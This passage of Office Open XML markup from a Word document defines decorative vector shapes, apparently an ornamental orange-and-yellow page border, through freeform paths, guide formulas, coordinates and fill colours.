                                  <a:gd name="T1" fmla="*/ 13 h 30"/>
                                  <a:gd name="T2" fmla="*/ 155 w 161"/>
                                  <a:gd name="T3" fmla="*/ 21 h 30"/>
                                  <a:gd name="T4" fmla="*/ 145 w 161"/>
                                  <a:gd name="T5" fmla="*/ 30 h 30"/>
                                  <a:gd name="T6" fmla="*/ 11 w 161"/>
                                  <a:gd name="T7" fmla="*/ 30 h 30"/>
                                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                                  <a:gd name="T9" fmla="*/ 21 h 30"/>
                                  <a:gd name="T10" fmla="*/ 0 w 161"/>
                                  <a:gd name="T11" fmla="*/ 8 h 30"/>
                                  <a:gd name="T12" fmla="*/ 11 w 161"/>
                                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                                  <a:gd name="T14" fmla="*/ 140 w 161"/>
                                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                                  <a:gd name="T16" fmla="*/ 150 w 161"/>
                                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                                  <a:gd name="T18" fmla="*/ 161 w 161"/>
                                  <a:gd name="T19" fmla="*/ 13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30">
                                    <a:moveTo>
                                      <a:pt x="161" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="140" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="161" y="1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347"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7519" y="4915"/>
                                <a:ext cx="99" cy="8"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 99 w 99"/>
                                  <a:gd name="T1" fmla="*/ 8 h 8"/>
                                  <a:gd name="T2" fmla="*/ 47 w 99"/>
                                  <a:gd name="T3" fmla="*/ 8 h 8"/>
                                  <a:gd name="T4" fmla="*/ 0 w 99"/>
                                  <a:gd name="T5" fmla="*/ 8 h 8"/>
                                  <a:gd name="T6" fmla="*/ 0 w 99"/>
                                  <a:gd name="T7" fmla="*/ 4 h 8"/>
                                  <a:gd name="T8" fmla="*/ 47 w 99"/>
                                  <a:gd name="T9" fmla="*/ 0 h 8"/>
                                  <a:gd name="T10" fmla="*/ 99 w 99"/>
                                  <a:gd name="T11" fmla="*/ 4 h 8"/>
                                  <a:gd name="T12" fmla="*/ 99 w 99"/>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99" h="8">
                                    <a:moveTo>
                                      <a:pt x="99" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="99" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="99"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348"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7855" y="3161"/>
                                <a:ext cx="68" cy="52"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 42 w 68"/>
                                  <a:gd name="T1" fmla="*/ 0 h 52"/>
                                  <a:gd name="T2" fmla="*/ 57 w 68"/>
                                  <a:gd name="T3" fmla="*/ 35 h 52"/>
                                  <a:gd name="T4" fmla="*/ 68 w 68"/>
                                  <a:gd name="T5" fmla="*/ 48 h 52"/>
                                  <a:gd name="T6" fmla="*/ 68 w 68"/>
                                  <a:gd name="T7" fmla="*/ 52 h 52"/>
                                  <a:gd name="T8" fmla="*/ 62 w 68"/>
                                  <a:gd name="T9" fmla="*/ 52 h 52"/>
                                  <a:gd name="T10" fmla="*/ 31 w 68"/>
                                  <a:gd name="T11" fmla="*/ 39 h 52"/>
                                  <a:gd name="T12" fmla="*/ 0 w 68"/>
                                  <a:gd name="T13" fmla="*/ 30 h 52"/>
                                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                                  <a:gd name="T15" fmla="*/ 26 h 52"/>
                                  <a:gd name="T16" fmla="*/ 11 w 68"/>
                                  <a:gd name="T17" fmla="*/ 22 h 52"/>
                                  <a:gd name="T18" fmla="*/ 21 w 68"/>
                                  <a:gd name="T19" fmla="*/ 9 h 52"/>
                                  <a:gd name="T20" fmla="*/ 26 w 68"/>
                                  <a:gd name="T21" fmla="*/ 0 h 52"/>
                                  <a:gd name="T22" fmla="*/ 31 w 68"/>
                                  <a:gd name="T23" fmla="*/ 0 h 52"/>
                                  <a:gd name="T24" fmla="*/ 42 w 68"/>
                                  <a:gd name="T2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8" h="52">
                                    <a:moveTo>
                                      <a:pt x="42" y="0"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="68" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="68" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="0"/>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E5735E7" id="Group 348" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.05pt;margin-top:3.85pt;width:524.55pt;height:723.15pt;z-index:-251657216" coordorigin="1942,1031" coordsize="9163,1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">
                <v:group id="Group 3" o:spid="_x0000_s1027" style="position:absolute;left:9360;top:930;width:1620;height:1870;rotation:9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">
                  <v:rect id="AutoShape 4" o:spid="_x0000_s1028"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" filled="f" stroked="f">
                    <o:lock v:ext="edit" aspectratio="t"/>
                  </v:rect>
                  <v:shape id="Freeform 5" o:spid="_x0000_s1029"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" path="m165,31r-10,8l140,31,108,22,72,18r-31,l10,22,,22,21,9,46,5,67,,93,5r36,13l165,31xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="165,31;155,39;155,39;140,31;108,22;72,18;41,18;10,22;0,22;21,9;46,5;67,0;93,5;129,18;165,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 6" o:spid="_x0000_s1030"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7" o:spid="_x0000_s1031"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8" o:spid="_x0000_s1032"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" path="m36,13r-5,9l21,26,11,22,,13,5,5,16,,26,5r10,8xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,26;11,22;0,13;5,5;16,0;26,5;36,13" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 9" o:spid="_x0000_s1033"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10" o:spid="_x0000_s1034"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11" o:spid="_x0000_s1035"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" path="m31,39l,,21,17,31,39xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,39;0,0;21,17;31,39" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 12" o:spid="_x0000_s1036"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" path="m16,13l5,9,,,16,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,13;5,9;0,0;16,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 13" o:spid="_x0000_s1037"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" path="m31,8l41,125r-5,5l31,134,15,130r-5,l,125,,65,,4,10,,20,,31,4r,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,8;41,125;36,130;31,134;15,130;10,130;0,125;0,65;0,4;10,0;20,0;31,4;31,8" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 14" o:spid="_x0000_s1038"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15" o:spid="_x0000_s1039"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" path="m11,13l,,11,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,13" o:connectangles="0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 16" o:spid="_x0000_s1040"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" path="m10,17l5,13,,,10,17xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,17;5,13;0,0;10,17" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 17" o:spid="_x0000_s1041"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" path="m,13l,9,,,,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,13;0,9;0,0;0,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 18" o:spid="_x0000_s1042"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" path="m16,4r,87l6,74,,48,,4,11,r5,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,4;16,91;6,74;0,48;0,4;11,0;16,4" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 19" o:spid="_x0000_s1043"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" path="m11,83l6,87,,83,,5,6,r5,5l11,83xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,83;6,87;0,83;0,5;6,0;11,5;11,83" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 20" o:spid="_x0000_s1044"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" path="m103,4l20,43,36,60r15,9l87,82r16,l77,78,51,69,25,60,,43,25,30,46,17,98,r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="103,4;20,43;36,60;51,69;87,82;103,82;77,78;51,69;25,60;0,43;25,30;46,17;98,0;103,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 21" o:spid="_x0000_s1045"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" path="m6,17l,8,,,6,8r,9xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6,17;0,8;0,0;6,8;6,17" o:connectangles="0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 22" o:spid="_x0000_s1046"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23" o:spid="_x0000_s1047"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" path="m11,13l,,11,9r,4xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,9;11,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 24" o:spid="_x0000_s1048"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" path="m57,52r-21,l21,43,10,35,,26,,22,10,13,26,4,57,r,52xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,52;36,52;21,43;10,35;0,26;0,22;10,13;26,4;57,0;57,52" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 25" o:spid="_x0000_s1049"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" path="m83,13r10,5l104,22r10,l124,26r-20,5l88,39,73,48,36,39,,22,16,18,36,9,73,,83,13xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83,13;93,18;104,22;114,22;124,26;104,31;88,39;73,48;36,39;0,22;16,18;36,9;73,0;83,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 26" o:spid="_x0000_s1050"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27" o:spid="_x0000_s1051"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28" o:spid="_x0000_s1052"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" path="m25,l10,4,,4,5,r5,l25,xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,0;10,4;0,4;5,0;10,0;25,0" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 29" o:spid="_x0000_s1053"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30" o:spid="_x0000_s1054"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" path="m11,34l6,64,16,86r5,26l37,138r-6,4l11,112,,82,,47,6,12,16,r,8l16,17,11,34xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,34;6,64;16,86;21,112;37,138;31,142;11,112;0,82;0,47;6,12;16,0;16,8;16,17;11,34" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 31" o:spid="_x0000_s1055"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32" o:spid="_x0000_s1056"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" path="m25,8r-5,9l10,25,,21,,17,,8,10,,20,4r5,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,8;20,17;10,25;0,21;0,17;0,8;10,0;20,4;25,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 33" o:spid="_x0000_s1057"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34" o:spid="_x0000_s1058"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" path="m31,26r-5,l20,21,,8,,,31,26xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,26;26,26;20,21;0,8;0,0;31,26" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 35" o:spid="_x0000_s1059"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" path="m73,65r-16,l47,60,26,52,11,26,,,26,17r26,9l62,34r11,5l78,52,73,65xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="73,65;57,65;47,60;26,52;11,26;0,0;26,17;52,26;62,34;73,39;78,52;73,65" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 36" o:spid="_x0000_s1060"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37" o:spid="_x0000_s1061"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38" o:spid="_x0000_s1062"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" path="m36,18r,4l31,26,15,22,,9,,,21,9r15,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,18;36,22;31,26;15,22;0,9;0,9;0,0;21,9;36,18" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 39" o:spid="_x0000_s1063"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40" o:spid="_x0000_s1064"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" path="m31,13l26,26r-5,l16,26,5,22,,17,,9,11,,26,4r5,9xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;21,26;16,26;5,22;0,17;0,9;11,0;26,4;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 41" o:spid="_x0000_s1065"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" path="m36,13r-5,9l21,22r-10,l,13,21,,31,5r5,8xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,22;11,22;0,13;21,0;31,5;36,13" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 42" o:spid="_x0000_s1066"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" path="m46,13l31,22,20,26r-5,l5,18,,9,15,r5,l36,5r10,8xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,13;31,22;20,26;15,26;5,18;0,9;15,0;20,0;36,5;46,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 43" o:spid="_x0000_s1067"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" path="m21,4l16,8r,5l6,8,,4,6,,16,r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,4;16,8;16,13;6,8;0,4;6,0;16,0;21,4" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 44" o:spid="_x0000_s1068"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" path="m26,4l20,9,5,9,,,15,,26,4xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,4;20,9;5,9;0,0;15,0;26,4" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 45" o:spid="_x0000_s1069"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" path="m31,9l15,18,5,18,,18,15,,26,r5,l31,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,9;15,18;5,18;0,18;15,0;26,0;31,0;31,9" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 46" o:spid="_x0000_s1070"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47" o:spid="_x0000_s1071"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48" o:spid="_x0000_s1072"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" path="m10,9r5,1268l15,1316r-5,18l,1351r,-78l,4,10,r,4l10,9xe" fillcolor="#ff7f00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,9;15,1277;15,1316;10,1334;0,1351;0,1273;0,4;10,0;10,4;10,9" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 49" o:spid="_x0000_s1073"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50" o:spid="_x0000_s1074"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51" o:spid="_x0000_s1075"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" path="m135,13r,9l129,31,109,48,62,83,21,113,11,109,,104,21,78,52,52,109,5,119,r5,l135,13xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="135,13;135,22;129,31;109,48;62,83;21,113;11,109;0,104;21,78;52,52;109,5;119,0;124,0;135,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 52" o:spid="_x0000_s1076"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53" o:spid="_x0000_s1077"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" path="m57,4l6,48,,48,26,22,42,9,57,r,4xe" fillcolor="#ff7f00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,4;6,48;0,48;26,22;42,9;57,0;57,4" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 54" o:spid="_x0000_s1078"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55" o:spid="_x0000_s1079"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" path="m26,39r-16,l,26,,,26,18r5,8l31,35r-5,4xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,39;10,39;0,26;0,0;26,18;31,26;31,35;26,39" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 56" o:spid="_x0000_s1080"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57" o:spid="_x0000_s1081"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58" o:spid="_x0000_s1082"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" path="m5,r,l,4,,,5,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5,0;5,0;0,4;0,4;0,0;5,0" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 59" o:spid="_x0000_s1083"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" path="m94,13l62,17,21,51,11,47,,38,11,21,21,4,42,,52,,83,,94,13xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="94,13;62,17;21,51;11,47;0,38;11,21;21,4;42,0;52,0;83,0;94,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 60" o:spid="_x0000_s1084"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" path="m16,34r-6,l,30,,21,5,8,16,r,34xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,34;10,34;0,30;0,21;5,8;16,0;16,34" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 61" o:spid="_x0000_s1085"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62" o:spid="_x0000_s1086"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" path="m,l,4,,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;0,4;0,0" o:connectangles="0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 63" o:spid="_x0000_s1087"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64" o:spid="_x0000_s1088"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" path="m26,8r,9l21,17,,17,,8,5,,15,,26,8xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,17;21,17;0,17;0,8;5,0;15,0;26,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 65" o:spid="_x0000_s1089"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66" o:spid="_x0000_s1090"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67" o:spid="_x0000_s1091"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" path="m37,17r,13l26,30r-5,l16,30,,,16,8r21,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,17;37,30;26,30;21,30;16,30;0,0;16,8;37,17" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 68" o:spid="_x0000_s1092"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69" o:spid="_x0000_s1093"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" path="m68,21r5,18l83,60r-15,l52,56,31,43,,,31,13r37,8xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="68,21;73,39;83,60;68,60;52,56;31,43;0,0;0,0;31,13;68,21" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 70" o:spid="_x0000_s1094"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" path="m47,22l36,26r-15,l,4,16,,31,,47,22xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="47,22;36,26;21,26;0,4;16,0;31,0;47,22" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 71" o:spid="_x0000_s1095"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" path="m26,8r,13l11,26r-5,l,17,6,8,11,,21,4r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,21;11,26;6,26;0,17;6,8;11,0;21,4;26,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 72" o:spid="_x0000_s1096"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" path="m109,48l93,44,78,39,52,22,36,39,26,48,10,52,,52,15,35,26,18,41,,52,,67,,93,22r16,26xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="109,48;93,44;78,39;52,22;36,39;26,48;10,52;0,52;15,35;26,18;41,0;52,0;67,0;93,22;109,48" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 73" o:spid="_x0000_s1097"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" path="m31,13l26,26,16,35,5,26,,17,,13,5,4,16,,26,4r5,5l31,13xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;16,35;5,26;0,17;0,13;5,4;16,0;26,4;31,9;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 74" o:spid="_x0000_s1098"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" path="m20,l15,21r-5,5l,26,,21,,13,10,,20,xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,0;15,21;10,26;0,26;0,21;0,13;10,0;20,0" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 75" o:spid="_x0000_s1099"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" path="m26,26l16,22,11,17,,,6,,21,13r5,9l26,26xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,26;16,22;11,17;0,0;6,0;21,13;26,22;26,26" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 76" o:spid="_x0000_s1100"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" path="m20,8r-5,9l5,21,,13,,4,5,,15,4r5,4xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,8;15,17;5,21;0,13;0,4;5,0;15,4;20,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 77" o:spid="_x0000_s1101"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" path="m20,9r-5,4l10,17,,13,5,,15,r5,9xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,9;15,13;10,17;0,13;5,0;15,0;20,9" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 78" o:spid="_x0000_s1102"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79" o:spid="_x0000_s1103"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" path="m62,31r5,17l67,65,52,70,41,78r,5l41,96r-10,4l26,100r,-9l26,78,,65,15,31,31,,41,5r11,8l62,31xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,31;67,48;67,65;52,70;41,78;41,83;41,96;31,100;26,100;26,91;26,78;0,65;15,31;31,0;41,5;52,13;62,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 80" o:spid="_x0000_s1104"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" path="m37,13r,13l26,34,11,30,,21,,13,,8,16,,31,4r6,9xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,13;37,26;26,34;11,30;0,21;0,13;0,8;16,0;31,4;37,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 81" o:spid="_x0000_s1105"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" path="m26,9r-6,8l15,22,5,22,,13,,4,5,,20,r6,9xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,9;20,17;15,22;5,22;0,13;0,4;5,0;20,0;26,9" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 82" o:spid="_x0000_s1106"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83" o:spid="_x0000_s1107"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84" o:spid="_x0000_s1108"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" path="m57,43l,43,5,34,10,21,26,r5,l36,4,57,21r,13l57,43xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,43;0,43;5,34;10,21;26,0;31,0;31,0;36,4;57,21;57,34;57,43" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 85" o:spid="_x0000_s1109"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" path="m98,4r,l47,8,26,8,,4,,,52,,73,,98,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="98,4;98,4;47,8;26,8;0,4;0,0;52,0;73,0;98,4" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 86" o:spid="_x0000_s1110"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" path="m161,13r-6,8l145,30,11,30,,21,,8,11,,140,r10,l161,13xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="161,13;155,21;145,30;11,30;0,21;0,8;11,0;140,0;150,0;161,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 87" o:spid="_x0000_s1111"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" path="m99,8l47,8,,8,,4,47,,99,4r,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="99,8;47,8;0,8;0,4;47,0;99,4;99,8" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 88" o:spid="_x0000_s1112"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" path="m42,l57,35,68,48r,4l62,52,31,39,,30,,26,11,22,21,9,26,r5,l42,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="42,0;57,35;68,48;68,52;62,52;31,39;0,30;0,26;11,22;21,9;26,0;31,0;42,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                </v:group>
                <v:group id="Group 89" o:spid="_x0000_s1113" style="position:absolute;left:1979;top:1061;width:1620;height:180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AutoShape 90" o:spid="_x0000_s1114"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" filled="f" stroked="f">
                    <o:lock v:ext="edit" aspectratio="t"/>
                  </v:rect>
                  <v:shape id="Freeform 91" o:spid="_x0000_s1115"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" path="m165,31r-10,8l140,31,108,22,72,18r-31,l10,22,,22,21,9,46,5,67,,93,5r36,13l165,31xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="165,31;155,39;155,39;140,31;108,22;72,18;41,18;10,22;0,22;21,9;46,5;67,0;93,5;129,18;165,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 92" o:spid="_x0000_s1116"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93" o:spid="_x0000_s1117"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94" o:spid="_x0000_s1118"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" path="m36,13r-5,9l21,26,11,22,,13,5,5,16,,26,5r10,8xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,26;11,22;0,13;5,5;16,0;26,5;36,13" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
